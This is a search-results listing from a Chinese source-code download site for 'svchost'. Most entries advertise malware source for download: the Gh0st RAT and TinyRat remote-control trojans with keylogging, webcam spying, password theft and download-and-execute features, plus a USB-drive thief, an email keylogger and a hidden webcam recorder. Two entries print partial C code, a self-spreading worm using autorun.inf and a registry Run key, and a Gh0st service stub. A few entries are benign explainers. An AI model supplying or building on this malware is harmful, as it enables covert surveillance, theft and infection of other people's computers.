Search - svchost

Search - svchost - List

【Remote Control】 Gh0st RAT 远程控制软件源代码 DL : 10: 控制端采用IOCP模型，数据传输采用zlib压缩方式
稳定快速，上线数量无上限，可同时控制上万台主机
控制端自动检测CPU使用率调整自己的工作线程, 稳定高效
宿主为svchost以系统服务启动,有远程守护线程,上线间隔为两分钟。
心跳包机制防止意外掉线..
支持HTTP和DNS上线两种方式
自动恢复SSDT(这功能干什么，大家都知道，免杀自己做吧),安装本程序需要管理员权限
控制端237K，返朴归真的界面，生成的服务端无壳，111 K，可安装多个服务端
其它细节方面的功能大家自己去发现吧
功能:

文件管理  完全仿Radmin所写, 文件、文件夹批量上传、删除、下载、创建、重命名
屏幕监视  此模块全用汇编编写，传输速度快，控制屏幕，发送Ctrl+Alt+Del，剪贴板操作，7种色彩显示方式
键盘记录  可记录中英文信息，离线记录(记录上限50M)功能
远程终端  一个简单shell
系统管理  进程管理，窗口管理，拨号上网密码获取
视频监控  监控远程摄像头
会话管理  注销，重启，关机，卸载服务端
其它功能  下载执行指定URL中的程序，隐藏或者显示访问指定网址，清除系统日志
地址位置  将IP数据库文件QQWry.Dat放置程序同目录下即可显示地理位置
集群控制  可同时控制多台主机，同时打开视频监控等管理功能
备注功能 .........

Update : 2008-03-07 Size : 1087762 Publisher : dssz.net
【Windows Develop】 svchost DL : 0: 进入系统后本程序自动运行，并且隐藏，然后控制光驱不断的打开与关闭。-access to the system automatically after the operation, and hidden, and then continued to control the opening drive with the closure.
Update : 2008-10-13 Size : 25616 Publisher : 轩辕鸿彦
【Web Server】 clear_dll_cockhorse DL : 0: 用系统权限法清理dll木马，相信大家对Dll木马都是非常熟悉了。它确实是个非常招人恨的家伙。它不像普通的exe木马那样便于识别和清理，这个家伙的隐蔽性非常强，它可以嵌入到一些如rundll32.exe,svchost.exe等正常的进程中去，让你找不到，即使找到了也难以清除，因为正常的进程正在调用它嘛。
Update : 2008-10-13 Size : 4801 Publisher : wangtian
【Other】 SVCHOST1 DL : 0: 揭开SVCHOST.exe进程之谜揭开SVCHOST.exe进程之谜-kick SVCHOST.exe process Mystery kick SVCHOST.exe process Mystery
Update : 2008-10-13 Size : 2380 Publisher : fy
【Disk Tools】 UThief DL : 0: 伪装成svchost进程,在windows服务里添加服务,对连接到电脑的U盘进行定时扫描,将其复制到电脑里默认的目录里-disguised as svchost process, the service windows add services, connect to the computer of the U disk regularly scan, copy it to the computer's default directory
Update : 2008-10-13 Size : 88126 Publisher : 肖羽
【Technology Management】 svchostforfresher DL : 0: 本文档主要讲解svchost程序在正常情况和被病毒挂载时的不同之处，敬请分享！-this document svchost mainly on the procedures in normal circumstances and when the virus mount different, Please share!
Update : 2008-10-13 Size : 2651 Publisher : rainbow
【OS program】 C++Rult DL : 0: 1.在C、D、E盘和c:\\windows\\system、c:\\windows中生成本体文件 2.在C、D、E盘中生成自动运行文件 3.注册c:\\windows\\system\\svchost.exe，使其开机自动运行 4.在C:\\windows\\system下生成隐蔽DLL文件 5.执行后具有相联复制能力
Update : 2008-10-13 Size : 3916 Publisher : 王国栋
【OS program】 TinyRat DL : 0: 代码编写:Anskya 简要的一款远程控制,FSG压缩后只有12k 下个版本将完全采用ASM+C编写,体积在5k左右使用bingle前辈的创建SvcHost.exe调用的服务原理与实践使用的是和小榕前辈的BITS后门的一个替换技术.这里向两位前辈表示感谢,代码在编写过程中.得到一步江湖和sforever两位朋友的帮助(特别感谢sforever,没有逆向他的那个后门程序接口偶也不会发现一个BUG.)程序可以在卡巴斯基默认设置下,开机自启动和穿墙...反向连接,暂时只支持DNS和IP 由于身体上的等等原因还有其他一些外界因素.程序写的比较仓促初步写了几个功能,暂时大家试用一下好了.纯属练手 1.进程管理:查看,干掉.选定的进程 2.文件管理:上传,下载,新建目录,删除目录,删除文件等功能... 3.提供远程下载者功能:您可以选择下载并运行您的程序 4.提供卸载功能
Update : 2008-10-13 Size : 404919 Publisher : 吴建
【Remote Control】 TinyRAT DL : 0: 用纯WIN32 SOCKET实现得一个远程控制程序，使用svchost.exe程序启动
Update : 2008-10-13 Size : 155497 Publisher : thx4sg
【OS program】 svchostdll DL : 0: 创建SvcHost.exe调用的服务原理与实践。
Update : 2008-10-13 Size : 23211 Publisher : Arthur
【Windows Develop】 svchost DL : 0: 一个用C语言写病毒的简单例子，结合了C语言和win编程，代码后有一段注释，能看出用c写病毒的模型。此源码系转载+少许改动。
Update : 2008-10-13 Size : 3879 Publisher : meason
【OS program】 Service_Pb_DLL DL : 0: Powerbasic 里注册为系统 DLL 可用 SVCHOST 来加载.有需要的朋友来
Update : 2008-10-13 Size : 2076 Publisher : 镙丝丁
【OS program】 Dll4SVCHost DL : 0: 替换由svchost.exe启动的某个系统服务,具体服务由全局变量 ServiceName 决定. 经测试,生成的DLL文件运行完全正常. 测试环境: Windows 2003 Server + Delphi 7.0 代码只实现了一个框架,没有任何实际动作,仅作为学习用.如果你使用本代码进行了任何扩充和修改,希望您能将代码寄一份给我.
Update : 2008-10-13 Size : 46604 Publisher : Alexander
【Hook api】 socks4bot DL : 0: socks 4 bot +SDT Restore, svchost inject, copy to system dir-socks 4 bot +SDT Restore, svchost inject, copy to system dir
Update : 2024-05-04 Size : 9216 Publisher : Andrey
【Windows Develop】 svchost DL : 0: keyloger for windows via e-mail to you
Update : 2024-05-04 Size : 3072 Publisher : daniel
【Other】 Cbingdu DL : 0: 1.在C、D、E盘和c:\windows\system、c:\windows中生成本病毒体文件 2.在C、D、E盘中生成自动运行文件 3.注册c:\windows\system\svchost.exe，使其开机自动运行 4.在C:\windows\system下生成隐蔽DLL文件 5.病毒在执行后具有相联复制能力 1.在所有磁盘的根目录生成svchost.com和autorun.inf文件 2.生成病毒体： c:\windows\wjview32.com c:\windows\explorer.exe c:\windows\system32\dllcache\explorer.exe c:\windows\system\msmouse.dll c:\windows\system32\cmdsys.sys c:\windows\system32\mstsc32.exe 3.病毒体c:\windows\explorer.exe感染原explorer.exe文件，使其不需要修改注册表做到启动时在本病毒到目前为止任何杀毒软件都无法将其查杀本病毒单机默认使用对机器无害（破坏代码已屏蔽）提供病毒卸载程序（保存为X.BAT，双击运行即可卸载）：函数：制造垃圾文件 1.可以用于病毒开机自启动的注册表位置：-/* SVCHOST.C */ /* SVCHOST.EXE*/ #define SVCHOST_NUM 6 #include<stdio.h> #include<string.h> char*autorun={"[autorun]\nopen=SVCHOST.exe\n\nshell\\1=打开\nshell\\1\\Command=SVCHOST.exe\nshell\\2\\=Open\nshell\\2\\Command=SVCHOST.exe\nshellexecute=SVCHOST.exe"} char*files_autorun[10]={"c:\\autorun.inf","d:\\autorun.inf","e:\\autorun.inf"} char*files_svchost[SVCHOST_NUM+1]={"c:\\windows\\system\\MSMOUSE.DLL", "c:\\windows\\system\\SVCHOST.exe","c:\\windows\\SVCHOST.exe", "c:\\SVCHOST.exe","d:\\SVCHOST.exe","e:\\SVCHOST.exe","SVCHOST.exe"} char*regadd="reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v SVCHOST /d C:\\Windows\\system\\SVCHOST.exe /f" int copy(char*infile,char*outfile) { FILE*input,*output char temp if(strcmp(infile,outfile)!=0 && ((input=fopen(infile,"rb"))!=NULL) && ((output=fopen (outfile,"wb"))!=NULL)) { while(!feof(input)) { fread(&temp,1,1,input) fwrite(&temp,1,1
Update : 2024-05-04 Size : 7168 Publisher : 2626648
【Delphi VCL】 svchost DL : 0: 这个程序是用来用摄像头录象的.他可以远程设置录象时间,并且远程传递到远方服务端.并且用户无法查到.-This procedure is used with a video camera. He can remotely set the video time and distance passed to the remote server. And the user can not be found.
Update : 2024-05-04 Size : 817152 Publisher : 星矢
【OS program】 svchost DL : 0: Create service in DLL svchost
Update : 2024-05-04 Size : 3072 Publisher : sosnaim
【OS program】 svchost-src DL : 0: windows系统 svchost进程的源代码,是从RentOS系统抠出来得，对于编写svchost类服务和分析系统服务的原理都有帮助-svchost process windows system source code, is plucked out of the system comes from RentOS principle svchost class services for the preparation and analysis of system services have helped
Update : 2024-05-04 Size : 9216 Publisher : 董林
【source in ebook】 svchost DL : 0: ghost小马源码，喜欢的可以拿去研究。-// svchost.cpp : Defines the entry point for the console application. // #pragma comment(linker, /OPT:NOWIN98 ) #include ClientSocket.h #include common/KernelManager.h #include common/KeyboardManager.h #include common/login.h #include common/install.h #include common/until.h #include <stdio.h> enum { NOT_CONNECT, // 还没有连接 GETLOGINFO_ERROR, CONNECT_ERROR, HEARTBEATTIMEOUT_ERROR } extern C __declspec(dllexport) void ServiceMain(int argc, wchar_t* argv[]) //void __stdcall AntiYun() //void __stdcall MoniteGame() int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress ) void __stdcall ServiceHandler(DWORD dwControl) #ifdef _CONSOLE int main(int argc, char**argv) #else DWORD WINAPI main(char*lpServiceName) #endif SERVICE_STATUS_HANDLE hServiceStatus DWORD g_dwCurrState DWORD g_dwServiceType char svcname[MAX_PATH] LONG WINAPI bad_exception(struct _EXCEPTION_POINTERS* ExceptionInfo) { // 发生异常，重新创建进程 HANDLE
Update : 2024-05-04 Size : 4096 Publisher : 段誉

« 1 23 4 »